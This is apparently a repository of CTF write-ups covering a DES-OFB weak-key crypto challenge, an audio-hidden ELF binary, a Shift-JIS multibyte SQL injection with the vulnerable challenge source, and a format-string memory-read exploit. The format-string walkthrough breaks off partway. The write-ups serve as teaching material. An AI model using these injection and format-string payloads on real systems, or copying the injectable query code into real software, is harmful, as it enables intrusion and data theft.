A quick glance at the code (and the challenge title) tells us that we're dealing with Data Encryption Standard (DES) utilizing Output Feedback (OFB) mode. We can also see in the code that we already have the Initialization Vector (IV) used for encryption ```IV = '13245678'```. A quick refresher on OFB shows that the decryption process envolves the ```IV``` and ```key``` being encrypted and then XORed with the ```ciphertext``` to return our ```plaintext```. 33 | 34 | ![Image of OFB] 35 | (./Images/601px-OFB_decryption.png) 36 | 37 | I know it's obvious, but for the sake of trying to write a thorough write-up I'll say it. Since we know the ```IV``` and ```ciphertext``` already, the last piece that we need to decrypt the message is the ```key``` itself. My first thought was just to try and bruteforce the key outright with the following script. 38 | 39 | ```python 40 | from Crypto.Cipher import DES 41 | 42 | def is_ascii(s): 43 | return all(ord(c) < 128 for c in s) 44 | def ByteToHex( byteStr ): 45 | return ''.join( [ "%02X" % ord( x ) for x in byteStr ] ).strip() 46 | 47 | f = open('ciphertext', 'r') 48 | ciphertext = f.read() 49 | f.close() 50 | i=0 51 | IV = '13245678' 52 | bites = ['\x00', '\x01', '\x02', '\x03', '\x04', '\x05', '\x06', '\x07', '\x08', '\x09', '\x0A', '\x0B', '\x0C', '\x0D', '\x0E', '\x0F', '\x10', '\x11', '\x12', '\x13', '\x14', '\x15', '\x16', '\x17', '\x18', '\x19', '\x1A', '\x1B', '\x1C', '\x1D', '\x1E', '\x1F', '\x20', '\x21', '\x22', '\x23', '\x24', '\x25', '\x26', '\x27', '\x28', '\x29', '\x2A', '\x2B', '\x2C', '\x2D', '\x2E', '\x2F', '\x30', '\x31', '\x32', '\x33', '\x34', '\x35', '\x36', '\x37', '\x38', '\x39', '\x3A', '\x3B', '\x3C', '\x3D', '\x3E', '\x3F', '\x40', '\x41', '\x42', '\x43', '\x44', '\x45', '\x46', '\x47', '\x48', '\x49', '\x4A', '\x4B', '\x4C', '\x4D', '\x4E', '\x4F', '\x50', '\x51', '\x52', '\x53', '\x54', '\x55', '\x56', '\x57', '\x58', '\x59', '\x5A', '\x5B', '\x5C', '\x5D', '\x5E', '\x5F', '\x60', '\x61', '\x62', '\x63', '\x64', '\x65', '\x66', '\x67', '\x68', '\x69', '\x6A', '\x6B', '\x6C', '\x6D', '\x6E', '\x6F', '\x70', '\x71', '\x72', '\x73', '\x74', '\x75', '\x76', '\x77', '\x78', '\x79', '\x7A', '\x7B', '\x7C', '\x7D', '\x7E', '\x7F', '\x80', '\x81', '\x82', '\x83', '\x84', '\x85', '\x86', '\x87', '\x88', '\x89', '\x8A', '\x8B', '\x8C', '\x8D', '\x8E', '\x8F', '\x90', '\x91', '\x92', '\x93', '\x94', '\x95', '\x96', '\x97', '\x98', '\x99', '\x9A', '\x9B', '\x9C', '\x9D', '\x9E', '\x9F', '\xA0', '\xA1', '\xA2', '\xA3', '\xA4', '\xA5', '\xA6', '\xA7', '\xA8', '\xA9', '\xAA', '\xAB', '\xAC', '\xAD', '\xAE', '\xAF', '\xB0', '\xB1', '\xB2', '\xB3', '\xB4', '\xB5', '\xB6', '\xB7', '\xB8', '\xB9', '\xBA', '\xBB', '\xBC', '\xBD', '\xBE', '\xBF', '\xC0', '\xC1', '\xC2', '\xC3', '\xC4', '\xC5', '\xC6', '\xC7', '\xC8', '\xC9', '\xCA', '\xCB', '\xCC', '\xCD', '\xCE', '\xCF', '\xD0', '\xD1', '\xD2', '\xD3', '\xD4', '\xD5', '\xD6', '\xD7', '\xD8', '\xD9', '\xDA', '\xDB', '\xDC', '\xDD', '\xDE', '\xDF', '\xE0', '\xE1', '\xE2', '\xE3', '\xE4', '\xE5', '\xE6', '\xE7', '\xE8', '\xE9', '\xEA', '\xEB', '\xEC', '\xED', '\xEE', '\xEF', '\xF0', '\xF1', '\xF2', '\xF3', '\xF4', '\xF5', '\xF6', '\xF7', '\xF8', '\xF9', '\xFA', '\xFB', '\xFC', '\xFD', '\xFE'] 53 | for bite1 in bites: 54 | for bite2 in bites: 55 | for bite3 in bites: 56 | for bite4 in bites: 57 | for bite5 in bites: 58 | for bite6 in bites: 59 | for bite7 in bites: 60 | for bite8 in bites: 61 | KEY=b''.join([bite1,bite2,bite3,bite4,bite5,bite6,bite7,bite8]) 62 | a = DES.new(KEY, DES.MODE_OFB, IV) 63 | plaintext = a.decrypt(ciphertext) 64 | if is_ascii(plaintext): 65 | print ByteToHex(KEY)+":"+plaintext 66 | ``` 67 | 68 | I should have realized just from the keyspace, but after a few minutes of bruteforcing it was obvious that this was not going to finish during the CTF, current month, or possibly the current year. I took a step back and looked a little deeper into DES and OFB together. I quickly came across an [article](http://crypto.stackexchange.com/questions/7938/may-the-problem-with-des-using-ofb-mode-be-generalized-for-all-feistel-ciphers) on ```crypto.stackexchange.com``` that proved to be very helpful. From the exchange of information there are a few key (no pun intended) pieces of information here. Namely the following: 69 | 70 | >That is correct as that is the definition of a DES weak key, a key for which encryption and decryption have the same effect. 71 | 72 | and 73 | 74 | >The output of every other blockcipher call would be the original IV which is assumed to be public knowledge, so the attacker can decrypt every other block w/o knowing the key. Further more the odd numbered blocks (if we start our numbering with 1) will all be encrypted with the same keystream. So that is a weakness in and of itself. But, even more so, since there are only 4 weak keys, the attacker can surely figure out the odd numbered blocks too (once he knows a weak key was used). 75 | 76 | This sounded perfect, but I didn't exactly know what the definition of a weak key was. With a little more help from Google I found an [article](https://en.wikipedia.org/wiki/Weak_key) that directly called out weak keys for DES. In it we find the following 4 weak keys: 77 | 78 | ``` 79 | 0x0000000000000000 80 | 0xFFFFFFFFFFFFFFFF 81 | 0xE1E1E1E1F0F0F0F0 82 | 0x1E1E1E1E0F0F0F0F 83 | ``` 84 | 85 | Using this information I went back and edited my initial brute force script to only use the following keys. 86 | 87 | ```python 88 | from Crypto.Cipher import DES 89 | 90 | f = open('ciphertext', 'r') 91 | ciphertext = f.read() 92 | f.close() 93 | IV = '13245678' 94 | KEY=b'\x00\x00\x00\x00\x00\x00\x00\x00' 95 | a = DES.new(KEY, DES.MODE_OFB, IV) 96 | plaintext = a.decrypt(ciphertext) 97 | print plaintext 98 | 99 | KEY=b'\x1E\x1E\x1E\x1E\x0F\x0F\x0F\x0F' 100 | a = DES.new(KEY, DES.MODE_OFB, IV) 101 | plaintext = a.decrypt(ciphertext) 102 | print plaintext 103 | 104 | KEY="\xE1\xE1\xE1\xE1\xF0\xF0\xF0\xF0" 105 | a = DES.new(KEY, DES.MODE_OFB, IV) 106 | plaintext = a.decrypt(ciphertext) 107 | print plaintext 108 | 109 | KEY="\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 110 | a = DES.new(KEY, DES.MODE_OFB, IV) 111 | plaintext = a.decrypt(ciphertext) 112 | print plaintext 113 | ``` 114 | 115 | From the output we find the the decrypted plaintext. 116 | 117 | ``` 118 | To be, or not to be, that is the question: 119 | Whether 'tis Nobler in the mind to suffer 120 | The Slings and Arrows of outrageous Fortune, 121 | Or to take Arms against a Sea of troubles, 122 | And by opposing end them: to die, to sleep 123 | No more; and by a sleep, to say we end 124 | The Heart-ache, and the thousand Natural shocks 125 | That Flesh is heir to? 'Tis a consummation 126 | Devoutly to be wished. To die, to sleep, 127 | To sleep, perchance to Dream; aye, there's the rub, 128 | For in that sleep of death, what dreams may come, 129 | When we have shuffled off this mortal coil, 130 | Must give us pause. There's the respect 131 | That makes Calamity of so long life: 132 | For who would bear the Whips and Scorns of time, 133 | The Oppressor's wrong, the proud man's Contumely, 134 | The pangs of despised Love, the Law’s delay, 135 | The insolence of Office, and the Spurns 136 | That patient merit of the unworthy takes, 137 | When he himself might his Quietus make 138 | With a bare Bodkin? Who would Fardels bear, 139 | To grunt and sweat under a weary life, 140 | But that the dread of something after death, 141 | The undiscovered Country, from whose bourn 142 | No Traveller returns, Puzzles the will, 143 | And makes us rather bear those ills we have, 144 | Than fly to others that we know not of. 145 | Thus Conscience does make Cowards of us all, 146 | And thus the Native hue of Resolution 147 | Is sicklied o'er, with the pale cast of Thought, 148 | And enterprises of great pitch and moment, 149 | With this regard their Currents turn awry, 150 | And lose the name of Action. Soft you now, 151 | The fair Ophelia? Nymph, in thy Orisons 152 | Be all my sins remembered. BKPCTF{so_its_just_a_short_repeating_otp!} 153 | ``` 154 | 155 | We did recover the flag ```BKPCTF{so_its_just_a_short_repeating_otp!}```, but we should hold true to the description and marvel at how broken everything is. To that effect, I've included the output of one of the incorrect weak keys. It's amazing how much you can see without actually having the correct decryption key. 156 | 157 | ``` 158 | g?䲕??or not to??????at is the??????on: 159 | WhethV?????? Nobler i]స???ind to suU??????e Slings R?????ows of ouG??????s Fortuneʋ???? take Arm@ॷ???st a Sea \?䤂??bles, 160 | And?????osing end??????to die, t\෼??? 161 | No more;?????? a sleep,?????? we end 162 | T[?䘕??t-ache, a]?䤘?thousand }?????? shocks 163 | T[?????sh is heiAిϤ?Tis a con@??????on 164 | Devout_?䤟??e wished.?????, to sleeC?΄???leep, perP?????to Dream;???ܤ?here's thVඥ???For in thR?䣜??p of deat[?䧘?? dreams mR?䳟??, 165 | When we??????huffled oU?䤘?? mortal c\??????st give u@റ???. There's??????spect 166 | ThaGੱ??? Calamity?????long life ʂ????ho would Q??????e Whips a]?䃓??ns of timV?΄??Oppressor?䧂??g, the pr\?????'s ContumV??????e pangs oU࠵???sed Love,??????w’s delR??ڤ?? insolencV૶???fice, and??????urns 167 | That??????t merit oUస???nworthy tR???܎?hen he hi^??????ight his b?????? make 168 | Wit[????e Bodkin???????uld Farde_?䲕??, 169 | To grunGॾ???weat undeA?????ry life, 170 | q??????t the dreR?俖??omething R??????eath, 171 | The??????overed CoF??????from whosVি??? 172 | No Trave_??????turns, PuI??????he will, 173 | r?????es us rat[?????r those i_?????have, 174 | Tha]ࢼ???o others G?????? know not??????us ConsciV??????es make C\??????of us allʅ????hus the NR??????ue of Res\?????? 175 | Is sicklZ????r, with t[?䠑?? cast of g??????, 176 | And entV??????s of greaGഹ??? and mome]??ڧ??h this reT??????eir Curre]??????n awry, 177 | A]?伟?? the name?????ion. Soft??????w, 178 | The faZ?䟀??lia? Nymp[?乞??hy Orison@ʆ????l my sins??????ered. BKPp??????its_just_R??????_repeatinT?????? 179 | ``` 180 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/ciphertext: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Crypto/des-ofb/ciphertext -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/Images/lily.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Misc/lily/Images/lily.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/Readme.md: -------------------------------------------------------------------------------- 1 | #lily.flac 2 | 3 | **Category:** Misc 4 | **Points:** 2 5 | **Description:** 6 | 7 | more than just a few bleebs ;) 8 | 9 | ##Write-up 10 | In this challege we were provided with an [flac](./lily.flac) audio file. After listening to the file, we opened it up with ```audacity``` and tried to look for any hidden messages or patterns. 11 | 12 | ![Spectrogram](./Images/lily.png) 13 | 14 | After hours and hours of messing with this file we finally turned too other writeups for some clues. As it turns out the noise in the begining is really the header of an ELF file. If we use ```sox``` to strip off the flac headers and look at the file type we will see that it is indeed just a binary. Modify the permissions and executing the binary yields the flag. 15 | 16 | ``` 17 | root@kali:~# sox lily.flac lily.raw 18 | root@kali:~# file lily.raw 19 | lily.raw: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d089edfc986a3cbdb64e3d9c65717a5f4209e13f, not stripped 20 | root@kali:~# chmod +x lily.raw 21 | root@kali:~# ./lily.raw 22 | BKPCTF{hype for a Merzbow/FSF collab album??} 23 | ``` 24 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/lily.flac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Misc/lily/lily.flac -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/monty.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/monty.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/sjis-kgo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/sjis-kgo.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/sjis-request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/sjis-request.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Readme.md: -------------------------------------------------------------------------------- 1 | #Good Morning 2 | 3 | **Category:** Web 4 | **Points:** 3 5 | **Description:** 6 | 7 | https://s3.amazonaws.com/bostonkeyparty/2016/bffb53340f566aef7c4169d6b74bbe01be56ad18.tgz 8 | 9 | ##Write-up 10 | An initial visit to the site provided a familiar question set from the movie ```Monty Python and the Holy Grail```. They were: 11 | * What is your name? 12 | * What is your quest? 13 | * What is your favourite color? 14 | 15 | ![Question](./Images/monty.png) 16 | 17 | The Japanese theme also stands out throughout the site. 18 | 19 | A quick look at the [source code](./release) reveals a ```websocket``` that communicates through ```json``` requests. 20 | 21 | ```python 22 | def process_questsions(ws): 23 | i = 0 24 | conn = MySQLdb.connect(**connect_params) 25 | with conn as cursor: 26 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 27 | while not ws.closed: 28 | message = ws.receive() 29 | if not message: continue 30 | message = json.loads(message) 31 | if message["type"] == "answer": 32 | question = mysql_escape(questions[i]) 33 | answer = mysql_escape(message["answer"]) 34 | cursor.execute('INSERT INTO answers (question, answer) VALUES ("%s", "%s")' % (question, answer)) 35 | conn.commit() 36 | i += 1 37 | if i < len(questions): 38 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 39 | elif message["type"] == "get_answer": 40 | question = mysql_escape(message["question"]) 41 | answer = mysql_escape(message["answer"]) 42 | cursor.execute('SELECT * FROM answers WHERE question="%s" AND answer="%s"' % (question, answer)) 43 | ws.send(json.dumps({"type": "got_answer", "row": cursor.fetchone()})) 44 | print message 45 | ``` 46 | 47 | ```javascript 48 | $("#prompt-input input").keyup(function(event) { 49 | if (event.keyCode != 13) { return; } // enter 50 | var answer = $(this).val(); 51 | socket.send(JSON.stringify({"type": "answer", "answer": answer })); 52 | if (last) { 53 | socket.send(JSON.stringify({"type": "get_answer", "question": question, "answer": answer})); 54 | } 55 | }); 56 | ``` 57 | 58 | After the initial question sequence there was a ```get_answer``` request that was followed by a ```got_answer``` response. This ```get_answer``` request effectively let you query the database with the following query: 59 | 60 | ```sql 61 | SELECT * FROM answers WHERE question="%s" AND answer="%s 62 | ``` 63 | 64 | It seemed obvious from this that we need to bypass the ```WHERE``` clause with a SQLi to dump the database and the flag itself. However, it is also important to note that there was an escape routine present that thwarted our best efforts for standard SQLi style attacks. 65 | 66 | ```python 67 | MYSQL_SPECIAL_CHARS = [ 68 | ("\\", "\\\\"), 69 | ("\0", "\\0"), 70 | ("\n", "\\n"), 71 | ("\r", "\\r"), 72 | ("'", "\\'"), 73 | ('"', '\\"'), 74 | ("\x1a", "\\Z"), 75 | ] 76 | def mysql_escape(s): 77 | for find, replace in MYSQL_SPECIAL_CHARS: 78 | s = s.replace(find, replace) 79 | return s 80 | ``` 81 | 82 | A lot of time was spent trying to bypass these filters until a team member pointed out the charset being directly set in the code. 83 | 84 | ```python 85 | Response.charset = "shift-jis" 86 | connect_params["charset"] = "sjis" 87 | ``` 88 | 89 | A quick research of the charset revealed that it should be succeptible to a SQLi through a multibyte character. The multibyte attack works when a multibyte character is split into two separate bytes (because of a mismatch of character sets) and is used to manipulate the backend values. In this case, we needed a way to escape a double quote in order to successfully inject into the query. I spent hours trying different characters like ```葜``` to no avail. The thought was that by injecting ```葜\" or 1=1#``` it would split the Japanese character and the last byte of that character would turn into another ```\``` leaving us effectively with ```\\" or 1=1#```. The idea was actually spot on, but unfortunately we didn't find the correct character in time. It turns out we were focusing on the more complex characters when ¥ (0x005c) would have done the job. The injection would then be ```¥\" or 1=1#``` which again would be translated into ```\\" or 1=1#```. This injection actually was quite nice, we were able to escape the original double quote as to not screw up our ```json``` request, but on the backend, our ```\``` was escaped with another ```\``` that manifested out of the multibyte character. In the end the request did in fact spit out the flag as it was the first record in the database. 90 | 91 | ![flag](./Images/sjis-request.png) 92 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/ganbatte.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from flask import Flask, render_template, Response 4 | from flask_sockets import Sockets 5 | import json 6 | import MySQLdb 7 | 8 | app = Flask(__name__) 9 | sockets = Sockets(app) 10 | 11 | with open("config.json") as f: 12 | connect_params = json.load(f) 13 | 14 | connect_params["db"] = "ganbatte" 15 | 16 | # Use Shift-JIS for everything so it uses less bytes 17 | Response.charset = "shift-jis" 18 | connect_params["charset"] = "sjis" 19 | 20 | questions = [ 21 | "name", 22 | "quest", 23 | "favorite color", 24 | ] 25 | 26 | # List from http://php.net/manual/en/function.mysql-real-escape-string.php 27 | MYSQL_SPECIAL_CHARS = [ 28 | ("\\", "\\\\"), 29 | ("\0", "\\0"), 30 | ("\n", "\\n"), 31 | ("\r", "\\r"), 32 | ("'", "\\'"), 33 | ('"', '\\"'), 34 | ("\x1a", "\\Z"), 35 | ] 36 | def mysql_escape(s): 37 | for find, replace in MYSQL_SPECIAL_CHARS: 38 | s = s.replace(find, replace) 39 | return s 40 | 41 | @sockets.route('/ws') 42 | def process_questsions(ws): 43 | i = 0 44 | conn = MySQLdb.connect(**connect_params) 45 | with conn as cursor: 46 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 47 | while not ws.closed: 48 | message = ws.receive() 49 | if not message: continue 50 | message = json.loads(message) 51 | if message["type"] == "answer": 52 | question = mysql_escape(questions[i]) 53 | answer = mysql_escape(message["answer"]) 54 | cursor.execute('INSERT INTO answers (question, answer) VALUES ("%s", "%s")' % (question, answer)) 55 | conn.commit() 56 | i += 1 57 | if i < len(questions): 58 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 59 | elif message["type"] == "get_answer": 60 | question = mysql_escape(message["question"]) 61 | answer = mysql_escape(message["answer"]) 62 | cursor.execute('SELECT * FROM answers WHERE question="%s" AND answer="%s"' % (question, answer)) 63 | ws.send(json.dumps({"type": "got_answer", "row": cursor.fetchone()})) 64 | print message 65 | 66 | @app.route('/') 67 | def hello(): 68 | return app.send_static_file("index.html") 69 | 70 | if __name__ == "__main__": 71 | from gevent import pywsgi 72 | from geventwebsocket.handler import WebSocketHandler 73 | addr = ('localhost', 5000) 74 | 75 | server = pywsgi.WSGIServer(addr, app, handler_class=WebSocketHandler) 76 | server.serve_forever() 77 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==0.10.1 2 | Flask-Sockets==0.2.0 3 | Jinja2==2.8 4 | MarkupSafe==0.23 5 | MySQL-python==1.2.5 6 | Werkzeug==0.11.4 7 | argparse==1.2.1 8 | gevent==1.0.2 9 | gevent-websocket==0.9.5 10 | greenlet==0.4.9 11 | itsdangerous==0.24 12 | wsgiref==0.1.2 13 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/favicon.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/ganbatte-mayoi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/ganbatte-mayoi.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/index.html -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/questions.js: -------------------------------------------------------------------------------- 1 | var frames_template = [ 2 | "What", 3 | ".", 4 | ".", 5 | ".", 6 | " is", 7 | " your ", 8 | -1, 9 | "?", 10 | ]; 11 | 12 | var set_question = function(topic) { 13 | var prompt = $("#prompt"); 14 | var prompt_input = $("#prompt-input input"); 15 | 16 | var frames = []; 17 | 18 | for (var i = 0; i < frames_template.length; i++) { 19 | if (frames_template[i] == -1) { 20 | frames.push(topic); 21 | } else { 22 | frames.push(frames_template[i]); 23 | } 24 | } 25 | 26 | prompt.text(""); 27 | prompt_input.val(""); 28 | prompt_input.prop('disabled', true); 29 | 30 | var frame = 0; 31 | var interval = setInterval(function() { 32 | if (frame >= frames.length) { 33 | clearInterval(interval); 34 | prompt_input.prop('disabled', false).focus(); 35 | return; 36 | } 37 | prompt.text(prompt.text() + frames[frame]); 38 | frame += 1; 39 | }, 500); 40 | } 41 | 42 | var survey_done = function(user_num) { 43 | $("#prompt").text("Thanks for taking our survey!").append($("
")).append("You were user number " + user_num); 44 | $("#prompt-input").hide(); 45 | } 46 | 47 | var socket = new WebSocket("ws://" + document.location.host + "/ws"); 48 | 49 | $(function() { 50 | var question = ""; 51 | var last = false; 52 | 53 | socket.onmessage = function(event) { 54 | var msg = JSON.parse(event.data); 55 | if (msg["type"] == "question") { 56 | question = msg["topic"]; 57 | last = msg["last"]; 58 | set_question(msg["topic"]); 59 | } else if (msg["type"] == "got_answer") { 60 | survey_done(Math.floor(msg["row"][0] / 3)) 61 | } 62 | }; 63 | 64 | $("#prompt-input input").keyup(function(event) { 65 | if (event.keyCode != 13) { return; } // enter 66 | var answer = $(this).val(); 67 | socket.send(JSON.stringify({"type": "answer", "answer": answer })); 68 | if (last) { 69 | socket.send(JSON.stringify({"type": "get_answer", "question": question, "answer": answer})); 70 | } 71 | }); 72 | 73 | }); 74 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | /* This challenge would not have been possible without the help of waifu2x */ 3 | background: url(/static/ganbatte-mayoi.png) no-repeat center center fixed; 4 | background-size: cover; 5 | } 6 | h1,h2 { 7 | color: #9AE1A8; 8 | text-shadow: 1px 1px 0 #000, 9 | -1px 1px 0 #000, 10 | 1px -1px 0 #000, 11 | -1px -1px 0 #000, 12 | 0px 1px 0 #000, 13 | 0px -1px 0 #000, 14 | -1px 0px 0 #000, 15 | 1px 0px 0 #000, 16 | 2px 2px 0 #000, 17 | -2px 2px 0 #000, 18 | 2px -2px 0 #000, 19 | -2px -2px 0 #000, 20 | 0px 2px 0 #000, 21 | 0px -2px 0 #000, 22 | -2px 0px 0 #000, 23 | 2px 0px 0 #000, 24 | 1px 2px 0 #000, 25 | -1px 2px 0 #000, 26 | 1px -2px 0 #000, 27 | -1px -2px 0 #000, 28 | 2px 1px 0 #000, 29 | -2px 1px 0 #000, 30 | 2px -1px 0 #000, 31 | -2px -1px 0 #000; 32 | } 33 | @keyframes obnoxious_text1 { 34 | from { 35 | opacity: 1; 36 | font-size: 600%; 37 | } 38 | to { 39 | opacity: 0.5; 40 | font-size: 550%; 41 | } 42 | } 43 | 44 | h1 { 45 | width: 100%; 46 | font-size: 600%; 47 | position: fixed; 48 | top: 5%; 49 | left: 5%; 50 | margin: 0px; 51 | animation: 0.7s cubic-bezier(0.25,0.1,0.25,1) 0s infinite alternate obnoxious_text1; 52 | } 53 | 54 | @keyframes obnoxious_text2 { 55 | from { 56 | opacity: 1; 57 | font-size: 350%; 58 | } 59 | to { 60 | opacity: 0.5; 61 | font-size: 320%; 62 | } 63 | } 64 | 65 | h2 { 66 | text-align: right; 67 | position: absolute; 68 | right: 10%; 69 | bottom: 10%; 70 | margin: 0px; 71 | font-size: 350%; 72 | animation: 0.8s cubic-bezier(0.25,0.1,0.25,1) 0.2s infinite alternate obnoxious_text2; 73 | } 74 | 75 | #prompt-container { 76 | position: absolute; 77 | top: 50%; 78 | left: 50%; 79 | transform: translate(-50%, -50%); 80 | border: 1px solid #000; 81 | background-color: rgba(255, 255, 255, 0.9); 82 | border-radius: 25px; 83 | padding: 20px; 84 | box-sizing: border-box; 85 | font-family: sans-serif; 86 | } 87 | 88 | #prompt { 89 | text-align: center; 90 | font-weight: bold; 91 | font-size: 2em; 92 | } 93 | 94 | #prompt-input { 95 | margin-top: 0.5em; 96 | text-align: center; 97 | } 98 | 99 | #prompt-input input { 100 | width: 100%; 101 | box-sizing: border-box; 102 | font-size: 2em; 103 | text-align: center; 104 | opacity: 0.8; 105 | border: 1px solid #333; 106 | padding: 0.2em; 107 | } 108 | 109 | #prompt-input input[disabled] { 110 | background-color: #ccc; 111 | } 112 | -------------------------------------------------------------------------------- /2016/IceCTF/Stage_2/DearDiary/Readme.md: -------------------------------------------------------------------------------- 1 | #Dear Diary 2 | 3 | **Category:** Pwn 4 | **Points:** 60 5 | **Description:** 6 | 7 | We all want to keep our secrets secure and what is more important than our precious diary entries? We made this highly secure diary service that is sure to keep all your boy crushes and edgy poems safe from your parents. nc diary.vuln.icec.tf 6501 [download file](./deardiary) 8 | 9 | ##Write-up 10 | Initially we run the binary and see what kind of functionality exists within it. 11 | 12 | ``` 13 | root@kali:~# ./deardiary 14 | -- Diary 3000 -- 15 | 16 | 1. add entry 17 | 2. print latest entry 18 | 3. quit 19 | > 1 20 | Tell me all your secrets: Hello World! 21 | 22 | 1. add entry 23 | 2. print latest entry 24 | 3. quit 25 | > 2 26 | Hello World! 27 | 28 | 1. add entry 29 | 2. print latest entry 30 | 3. quit 31 | > 3 32 | ``` 33 | 34 | Ok, looks pretty simple. We supply some data and we can request that this data is then printed back out us. Let's try a format string and see what it does. 35 | 36 | ``` 37 | root@kali:~# python -c 'print "1\nAAAA"+"%08x."*10+"\n2\n3\n"'| ./deardiary 38 | -- Diary 3000 -- 39 | 40 | 1. add entry 41 | 2. print latest entry 42 | 3. quit 43 | > Tell me all your secrets: 44 | 1. add entry 45 | 2. print latest entry 46 | 3. quit 47 | > AAAAf755b7b6.f76cf000.ffa00f98.ffa02398.00000000.0000000a.4eedee00.00000000.00000000.ffa023a8. 48 | 49 | 1. add entry 50 | 2. print latest entry 51 | 3. quit 52 | ``` 53 | 54 | Well, it definitely looks like we are dealing with a format string issue as we are dumping memory out. Also, note that the command I am using along with the format string sytax is setup to move through the menu of the binary by itself. It lets me write a payload, read the payload back, and exit the program without any interaction. Now, let's dump a little more and see if we can see our "AAAA"s. 55 | 56 | ``` 57 | root@kali:~# python -c 'print "1\nAAAA"+"%08x."*20+"\n2\n3\n"'| ./deardiary 58 | -- Diary 3000 -- 59 | 60 | 1. add entry 61 | 2. print latest entry 62 | 3. quit 63 | > Tell me all your secrets: 64 | 1. add entry 65 | 2. print latest entry 66 | 3. quit 67 | > AAAAf75df7b6.f7753000.ff8cab88.ff8cbf88.00000000.0000000a.ea2b0000.00000000.00000000.ff8cbf98.0804888c.ff8cab88.00000004.f7753c20.00000000.00000000.00000001.41414141.78383025.3830252e. 68 | 69 | 1. add entry 70 | 2. print latest entry 71 | 3. quit 72 | ``` 73 | 74 | There we go, it looks as if our input was read back off the stack in the 18th position. Now we need to figure out what we can do. Let's take a look at the binary and see if there is a good memory location to mess with. 75 | 76 | ```asm 77 | flag: 78 | 0804863d push ebp ; XREF=main+27 79 | 0804863e mov ebp, esp 80 | 08048640 sub esp, 0x28 81 | 08048643 mov eax, dword [gs:0x14] 82 | 08048649 mov dword [ss:ebp+var_C], eax 83 | 0804864c xor eax, eax 84 | 0804864e mov dword [ss:esp+0x28+var_24], 0x0 ; argument "oflag" for method j_open 85 | 08048656 mov dword [ss:esp+0x28+var_28], 0x8048940 ; "./flag.txt", argument "path" for method j_open 86 | 0804865d call j_open 87 | 08048662 mov dword [ss:ebp+var_10], eax 88 | 08048665 mov dword [ss:esp+0x28+var_20], 0x100 ; argument "nbyte" for method j_read 89 | 0804866d mov dword [ss:esp+0x28+var_24], 0x804a0a0 ; argument "buf" for method j_read 90 | 08048675 mov eax, dword [ss:ebp+var_10] 91 | 08048678 mov dword [ss:esp+0x28+var_28], eax ; argument "fildes" for method j_read 92 | 0804867b call j_read 93 | 08048680 mov eax, dword [ss:ebp+var_C] 94 | 08048683 xor eax, dword [gs:0x14] 95 | 0804868a je 0x8048691 96 | 97 | 0804868c call j___stack_chk_fail 98 | 99 | 08048691 leave ; XREF=flag+77 100 | 08048692 ret 101 | ; endp 102 | ``` 103 | 104 | It looks as though the flag is on the server and being read in and saved into a buffer at ```0x804a0a0```. There is a good paper on [exploiting format string vulnerabilities](https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf) that has a section dedicated to viewing memory at an arbitrary location. Let's try to implement that. 105 | 106 | ``` 107 | root@kali:~# python -c 'print "1\n\xa0\xa0\x04\x08"+"%08x."*17+"%s\n2\n3\n"'| ./deardiary 108 | -- Diary 3000 -- 109 | 110 | 1. add entry 111 | 2. print 